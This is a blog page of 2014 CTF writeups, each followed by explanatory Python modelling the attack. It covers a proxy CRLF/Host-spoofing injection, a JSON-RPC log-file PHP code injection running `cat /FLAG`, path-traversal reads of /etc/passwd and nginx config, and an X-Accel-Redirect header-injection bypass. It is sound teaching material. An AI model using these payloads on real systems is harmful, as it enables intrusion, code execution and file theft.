A disturbing lack of taste. Just another WordPress site

24 Feb 2014

Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter "url":

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the response headers plus part of the body. We can easily reach the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since only part of the body is printed we can't see the whole response. After a bit of testing it turned out that the url parameter apparently ends up straight in the proxy's request line, so a CRLF injection is possible: we terminate the request line ourselves, add our own headers and a blank line, and use a Range: header to make the backend return only the slice of the body we are interested in.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A

<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since the admin page wants the Host header to be "hackme", let's set it ourselves:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N
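To make the header-injection step concrete, here is an added model of the chain (not the original solver's code). The way the proxy builds its backend request and the backend body used for the Range check are assumptions; the page only shows that the injected Host and Range headers take effect.

```python
import urllib.parse

# Added example: model of the Codegate web-proxy CRLF injection. The proxy's
# internal request format (proxy_build_request) is an assumption based on the
# fact that "<path> HTTP/1.0\r\n..." in the url parameter is honoured.
PROXY = "http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php"
ADMIN_PATH = "localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/"


def injected_url(path, host, first, last):
    """Value for the `url` parameter: close the proxy's request line early,
    then add our own Host and Range headers and a blank line so that whatever
    the proxy appends afterwards is no longer parsed as headers."""
    return (f"{path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            f"Range: bytes={first}-{last}\r\n"
            "Connection: close\r\n\r\n")


def exploit_url(path, host, first, last):
    """Full proxy URL with CR, LF and spaces percent-encoded (%0D%0A, %20)."""
    return PROXY + "?url=" + urllib.parse.quote(
        injected_url(path, host, first, last), safe="/:=,")


def proxy_build_request(url_param):
    """Assumed vulnerable proxy behaviour: the parameter is pasted verbatim
    into the request line, followed by the proxy's own headers."""
    return (f"GET {url_param} HTTP/1.0\r\n"
            "Host: 58.229.183.24\r\nUser-Agent: webproxy\r\n\r\n")


def parse_request(raw):
    """Split a raw request into (request line, headers, body) the way the
    backend does: headers end at the first blank line, the first Host wins."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip(), value.strip())
    return request_line, headers, body


def apply_range(body, range_header):
    """Serve a `bytes=first-last` range (inclusive, per RFC 7233) from a body."""
    first, last = range_header[len("bytes="):].split("-")
    return body[int(first):int(last) + 1]
```

Because the injected blank line comes first, the proxy's own Host header lands in the body of the request, which is why the backend sees "hackme" as the Host and answers with a 206 containing only the requested byte range.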

Razor4x

Filed under: Uncategorized 5 Comments
24 Feb 2014

Codegate CTF Preliminary 2014 – Clone Technique Writeup

The task gave us a binary that creates up to 400 threads, each started with 3 arguments that differ every time a new child is spawned. The last argument is used as a counter and the first two are used as seeds to generate the flag. We have to find out which thread has the correct arguments that lead to the flag. The routine that calculates the flag is at 0x401070. In this routine, as said before, the function takes the 2 arguments passed to the program at start and does some math on them to generate a sequence that is placed at ebp-4 (0x0012fecc). To find out which thread has the correct values, we place a JMP before the RET of this function to somewhere in the binary where we can print the flag, such as a message box or a write to a file.

http://postimg.org/image/kx1gogl9b/

As in the image, after the program returns from 0x401070 EAX still holds the address pointing to the flag, so we jump to a memory location where we previously placed our piece of asm code that prints it, such as 0x0040563a.

Now just run the program and watch the output until human-readable text comes up.

Razor4x

10 Feb 2014

Olympic CTF Sochi 2014 – Elf Quest 2 Writeup

As the task hints, the challenge is composed of three parts:

1) restore the original ELF header, which has been corrupted by overwriting some bytes with 'CC', by comparing it with another ELF header known to be correct (the corrupted parts are, for example, the OS/ABI field, the version, the class, ...).

2) after restoring the program and running it, it asks us for a passphrase used to decrypt some data inside it. Once the block is decrypted it turns out to be another ELF header with something hidden in it.

3) as in the previous Elf Quest, we have to find a way to extract some information from it. Counting the number of times each byte value occurs (0x00 100 times, 0xff 5 times, and so on) we get another corrupted ELF header, but this time it contains a small decryption routine that prints out the flag: CTF{bf7475cb1733885d35b60e13bc2d7b8f}
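As an added example covering parts 1 and 3 (not the original solver's code): a header repair that only copies fields a known-good binary can legitimately supply, plus the byte-count extraction as we read it. The sample headers are constructed (a plain x86-64 ELF64 header with 0xCC written over a few fields), and treating the per-byte-value counts, in order, as the bytes of the hidden file is our interpretation of the writeup.

```python
import struct
from collections import Counter

# Added example for parts 1 and 3 of Elf Quest 2. Sample data is constructed;
# the histogram-as-file reading of part 3 is an assumption about the challenge.
EHDR_LAYOUT = (("e_ident", "16s"), ("e_type", "H"), ("e_machine", "H"),
               ("e_version", "I"), ("e_entry", "Q"), ("e_phoff", "Q"),
               ("e_shoff", "Q"), ("e_flags", "I"), ("e_ehsize", "H"),
               ("e_phentsize", "H"), ("e_phnum", "H"), ("e_shentsize", "H"),
               ("e_shnum", "H"), ("e_shstrndx", "H"))
EHDR_FMT = "<" + "".join(fmt for _, fmt in EHDR_LAYOUT)   # Elf64_Ehdr, 64 bytes, LE
# Fields identical in any two ELF64 x86-64 executables, so a known-good header
# can be copied over them. e_entry, e_phoff, e_shoff and the counts are per-binary.
INVARIANT = {"e_ident", "e_type", "e_machine", "e_version",
             "e_ehsize", "e_phentsize", "e_shentsize"}


def parse_ehdr(hdr):
    names = (n for n, _ in EHDR_LAYOUT)
    return dict(zip(names, struct.unpack(EHDR_FMT, hdr[:64])))


def repair_ehdr(corrupt, good, marker=0xCC):
    """Return (fixed header, report). Invariant fields that differ from the
    reference are overwritten from it; variable fields are only reported when
    they contain the marker byte, since another binary cannot supply them."""
    fixed, report, pos = bytearray(corrupt[:64]), [], 0
    for name, fmt in EHDR_LAYOUT:
        size = struct.calcsize("<" + fmt)
        cur, ref = bytes(fixed[pos:pos + size]), bytes(good[pos:pos + size])
        if cur != ref:
            if name in INVARIANT:
                fixed[pos:pos + size] = ref
                report.append((name, pos, "copied from reference"))
            elif marker in cur:
                report.append((name, pos, "marker byte present, fix by hand"))
        pos += size
    return bytes(fixed), report


def byte_histogram_image(data):
    """Part 3 as we read it: the occurrence count of each byte value
    0x00..0xff, in order, forms the hidden file (counts taken modulo 256)."""
    counts = Counter(data)
    return bytes(counts[b] & 0xFF for b in range(256))


def make_sample():
    """Constructed known-good header plus a copy with 0xCC over EI_CLASS,
    EI_VERSION, EI_OSABI, e_machine and the low byte of e_entry."""
    good = bytes.fromhex(
        "7f454c46020101000000000000000000"   # e_ident: ELF, 64-bit, LE, v1, SYSV
        "0200" "3e00" "01000000"             # ET_EXEC, EM_X86_64, EV_CURRENT
        "7810400000000000"                   # e_entry 0x401078
        "4000000000000000" "0000000000000000" "00000000"   # e_phoff, e_shoff, e_flags
        "4000" "3800" "0100" "4000" "0000" "0000")         # sizes and counts
    bad = bytearray(good)
    for off in (4, 6, 7, 18, 19, 24):
        bad[off] = 0xCC
    return good, bytes(bad)
```

The report is the useful output: the e_entry entry tells you a 0xCC landed in a field you have to reconstruct from the program itself (for instance from the program headers or `_start`), rather than silently taking the other binary's entry point.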

Razor4x

10 Feb 2014

Olympic CTF Sochi 2014 – RPC Writeup

This challenge was about injecting a JSON-RPC string that is parsed by the server. After some investigation we found out that the __construct and __wakeup methods can be called and take the following parameters: log_dir, debug and state:

rpc_json_call={"jsonrpc": "2.0", "method": "__construct", "params":[1,2,3]}

We immediately thought of pointing log_dir somewhere under our control, like '/var/www', to see whether something gets written there:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":1}}]

but nothing happened. We then figured that our file is deleted when the script terminates, so we ran a Python script that loops requests to /test.php and prints the result, racing the deletion:

import requests

# Poll the file the RPC server writes into log_dir: it is removed once the
# server-side script ends, so keep requesting until a non-404 answer shows up.
while True:
    r = requests.get("http://109.233.61.11:8880/test.php")
    if r.status_code != 404:
        print(r.text)

But even this didn't work. So we tried sending a second RPC request to the server together with the first one:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":1}},{"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]

and this worked! We can see a serialized object containing the state we sent ("state":1) in the file. Since we have arbitrary control of the state and can also put strings in it, we can inject PHP code:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":"<?php system('cat /FLAG');?>"}},{"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]

Run this payload while the Python script is polling and it will print the flag:

CTF{b15ffee30a117f418d1cede6faa57778}
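As an added example (not the original solver's code), the batch payload built programmatically together with a model of why the trick works: PHP's serialize() writes string properties raw with a byte length in front, so the `<?php ... ?>` block survives intact in the log file, and the interpreter runs exactly that block when the file is requested as .php. The class name "Logger" and the object layout are assumptions; the page only shows that the state is serialized into log_dir after __wakeup.

```python
import json
import re

# Added example modelling the Olympic CTF RPC chain. "Logger" and the
# object layout in simulate_log_write are assumptions.
PAYLOAD = "<?php system('cat /FLAG');?>"


def build_batch(log_dir, state, debug=1):
    """JSON-RPC 2.0 batch: __construct sets log_dir/debug/state, a second call
    to __wakeup in the same request makes the server write the state to disk
    before the script ends."""
    return [
        {"jsonrpc": "2.0", "method": "__construct",
         "params": {"log_dir": log_dir, "debug": debug, "state": state}},
        {"jsonrpc": "2.0", "method": "__wakeup", "params": {}},
    ]


def encode_batch(log_dir, state, debug=1):
    """Value of the rpc_json_call parameter."""
    return json.dumps(build_batch(log_dir, state, debug))


def php_serialize(value, class_name=None):
    """Minimal re-implementation of PHP serialize() for int, str and dict
    (emitted as an object when class_name is given). String values are
    written raw, prefixed by their byte length, so a "<?php ... ?>" tag
    inside them lands unchanged in the log file."""
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        if class_name is not None:
            return f'O:{len(class_name)}:"{class_name}":{len(value)}:{{{body}}}'
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_code_blocks(text):
    """What the interpreter executes when a file is served as .php: only the
    <?php ... ?> blocks; everything around them is echoed to the client as-is."""
    return re.findall(r"<\?php.*?\?>", text, re.S)


def simulate_log_write(log_dir, state):
    """Assumed server side: the object filled by __construct is serialized and
    written to log_dir when __wakeup runs. Returns (path, file contents)."""
    obj = {"log_dir": log_dir, "debug": 1, "state": state}
    return log_dir, php_serialize(obj, "Logger")
```

Note the two ingredients the race depends on: the file name is attacker-chosen (so the .php extension is ours) and the serialized bytes are written verbatim; the polling loop above only has to win against the cleanup.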

nurfed, Razor4x

10 Feb 2014

Olympic CTF Sochi 2014 – xnginx Writeup

The task provides a website where we can browse through some different outputs:

http://109.233.61.11:27280/news/?f=31-12-2013

http://109.233.61.11:27280/news/?f=01-01-2014

After testing that parameter a bit, it turned out there was an LFI:

http://109.233.61.11:27280/news/?f=../../../etc/passwd

As the challenge hints, and as you can also see from the HTTP response headers, the server was nginx, so we go ahead and fetch its configuration file:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/nginx.conf

Now we can see that the sites nginx serves are defined under "/etc/nginx/sites-enabled/".

Opening the default one:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/sites-enabled/default

we can see an interesting thing:

location = /secret/flag {
    root /home;
    internal;
}

The path to the flag is http://109.233.61.11:27280/secret/flag, but since the location is marked "internal", nginx only serves it for internal redirects (error_page, rewrite, X-Accel-Redirect and the like) and answers direct client requests with a 404. We can get there through a CRLF injection in the "retpath" parameter, injecting an X-Accel-Redirect header so that the backend's response tells nginx to perform the internal redirect for us:

http://109.233.61.11:27280/?retpath=/news/%0d%0aX-Accel-Redirect:%20/secret/flag

Flag: CTF{6e75d02b8e8329bb4b45c7dabd2e1da2}
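As an added example (not the original solver's code), the header split modelled end to end: how the injected retpath turns one Location header into two, why nginx then serves the internal location, and the check the backend should have had. The backend code below is an assumption; the page only shows that retpath is reflected into a response header without filtering.

```python
import re
import urllib.parse

# Added example modelling the xnginx CRLF -> X-Accel-Redirect bypass. The
# backend's redirect handler (vulnerable_redirect) is assumed, not taken from
# the challenge; INTERNAL_LOCATIONS comes from the leaked sites-enabled/default.
INTERNAL_LOCATIONS = {"/secret/flag"}


def retpath_payload(internal_path, visible_path="/news/"):
    """Value of `retpath`: a CRLF ends the Location header, then an
    X-Accel-Redirect line tells nginx which internal location to serve."""
    return f"{visible_path}\r\nX-Accel-Redirect: {internal_path}"


def exploit_url(internal_path):
    return ("http://109.233.61.11:27280/?retpath="
            + urllib.parse.quote(retpath_payload(internal_path), safe="/:"))


def vulnerable_redirect(retpath):
    """Backend as assumed: builds the response with retpath unchecked."""
    return f"HTTP/1.1 302 Found\r\nLocation: {retpath}\r\nContent-Length: 0\r\n\r\n"


def hardened_redirect(retpath):
    """Refuse CR/LF (header injection) and anything but a same-site path."""
    if re.search(r"[\r\n]", retpath) or not retpath.startswith("/") or retpath.startswith("//"):
        raise ValueError("invalid redirect target")
    return f"HTTP/1.1 302 Found\r\nLocation: {retpath}\r\nContent-Length: 0\r\n\r\n"


def parse_response_headers(raw):
    head, _, _ = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers


def nginx_handles(upstream_response, requested_uri):
    """Model of nginx's documented behaviour: a client request for an
    `internal` location gets 404, but an X-Accel-Redirect header from the
    upstream triggers an internal redirect, which may land on that location
    (served from root /home, i.e. the file /home/secret/flag)."""
    if requested_uri in INTERNAL_LOCATIONS:
        return "404 direct access to internal location"
    _, headers = parse_response_headers(upstream_response)
    target = headers.get("X-Accel-Redirect")
    if target in INTERNAL_LOCATIONS:
        return f"serve /home{target}"
    return "pass upstream response through"
```

The `internal` directive is doing its job here; the weakness is entirely in the backend letting request data reach a response header with line breaks intact, which is why the fix belongs in the application rather than in the nginx config.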

Razor4x
